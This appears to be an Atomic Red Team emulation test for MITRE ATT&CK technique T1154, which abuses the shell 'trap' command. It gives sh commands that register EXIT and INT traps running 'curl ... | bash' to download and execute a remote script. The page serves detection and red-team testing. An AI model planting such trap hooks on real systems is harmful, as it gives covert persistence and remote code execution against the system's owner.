# T1154 - Trap
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1154)
<blockquote>The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.</blockquote>

## Atomic Tests

- [Atomic Test #1 - Trap](#atomic-test-1---trap)


<br/>

## Atomic Test #1 - Trap
After exiting the shell, the script will download and execute.

After sending a keyboard interrupt (CTRL+C) the script will download and execute.

**Supported Platforms:** macOS, CentOS, Ubuntu, Linux


#### Run it with `sh`!
```
trap 'nohup curl -sS https://gitlab.com/cvt111/atomic-red-team/raw/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://gitlab.com/cvt111/atomic-red-team/raw/master/atomics/T1154/echo-art-fish.sh | bash' INT
```
<br/>
